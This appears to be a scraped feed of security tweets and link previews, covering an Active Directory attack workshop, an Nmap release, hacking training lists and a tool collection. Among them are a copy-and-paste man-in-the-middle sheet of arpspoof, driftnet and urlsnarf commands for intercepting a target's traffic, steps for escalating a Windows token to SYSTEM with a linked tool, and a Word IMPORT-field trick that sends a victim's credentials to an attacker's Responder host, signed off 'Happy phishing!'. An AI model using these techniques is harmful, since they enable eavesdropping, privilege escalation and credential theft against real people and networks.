The slides and videos from our #BHUSA workshop on Active Directory attacks are now online! Access the deck and videos here: https://t.co/gsMOqH116E
Google Docs
TTPs to Attack Active Directory
Tactics, Techniques and Procedures for Attacking Active Directory BlackHat USA 2019 30-35 minutes total Link to this deck: https://bit.ly/2ZQIfGY
Nmap Defcon release! Enjoy version 7.80: https://t.co/tlaiSMzlCX
seclists.org
Nmap Announce: Nmap Defcon Release! 80+ improvements include new NSE scripts/libs, new Npcap, etc.
A huge lists of:
- Ethical Hacking Trainings
- CTF-s Platforms
- Pentesting Labs
- Web Training Apps (local installation)
- Bug Bounty Platforms
From: https://t.co/37le6OIHGh
- Ethical Hacking Trainings
- CTF-s Platforms
- Pentesting Labs
- Web Training Apps (local installation)
- Bug Bounty Platforms
From: https://t.co/37le6OIHGh
GitHub
GitHub - trimstray/the-book-of-secret-knowledge: A collection of inspiring lists, manuals, cheatsheets, blogs, hacks, one-liners…
A collection of inspiring lists, manuals, cheatsheets, blogs, hacks, one-liners, cli/web tools and more. - GitHub - trimstray/the-book-of-secret-knowledge: A collection of inspiring lists, manuals,...
MitM Copy&Paste Sheet 😎
#forwarding
sysctl -w net.ipv4.ip_forward=1
#redirect Traffic
arpspoof -i [Interface] -t [tgtIP] [RouterIP]
arpspoof -i [Interface] -t [RouterIP] [tgtIP]
#sniff pictures
driftnet -i [Interface]
#sniff URLs
urlsnarf -i [Interface]
#forwarding
sysctl -w net.ipv4.ip_forward=1
#redirect Traffic
arpspoof -i [Interface] -t [tgtIP] [RouterIP]
arpspoof -i [Interface] -t [RouterIP] [tgtIP]
#sniff pictures
driftnet -i [Interface]
#sniff URLs
urlsnarf -i [Interface]
Windows Token Privilege to "nt authority\system"
- Enable SE_DEBUG_NAME(debugprivileges) on the current process.
- Get a SYSTEM user token.
- Duplicate it to a Primary Token, so it can be passed to CreateProcess.
- Now we have duplicated the token, we can close the orginal.
- Enable SE_ASSIGNPRIMARYTOKEN_NAME and SE_INCREASE_QUOTA_NAME, these are both needed to start a process with a token.
- Enable SE_IMPERSONATE_NAME, so that we can impersonate the SYSTEM token.
- Start the process with the token.
- Clean up, revert back to self and close the handles
[Tool] Tokenvator3.5.exe
https://t.co/j8LOsvoZBH
- Enable SE_DEBUG_NAME(debugprivileges) on the current process.
- Get a SYSTEM user token.
- Duplicate it to a Primary Token, so it can be passed to CreateProcess.
- Now we have duplicated the token, we can close the orginal.
- Enable SE_ASSIGNPRIMARYTOKEN_NAME and SE_INCREASE_QUOTA_NAME, these are both needed to start a process with a token.
- Enable SE_IMPERSONATE_NAME, so that we can impersonate the SYSTEM token.
- Start the process with the token.
- Clean up, revert back to self and close the handles
[Tool] Tokenvator3.5.exe
https://t.co/j8LOsvoZBH
GitHub
0xbadjuju/Tokenvator
A tool to elevate privilege with Windows Tokens. Contribute to 0xbadjuju/Tokenvator development by creating an account on GitHub.
Submitted this to MSRC, won't patch, it's a "feature"; Open Word -> CTRL + F9 -> IMPORT "\\\\Responder-IP\\1.jpg" -> right click and select "Edit Field" -> tick "Data not stored in document" -> save & close. Open the document -> free credentials :) Happy phishing!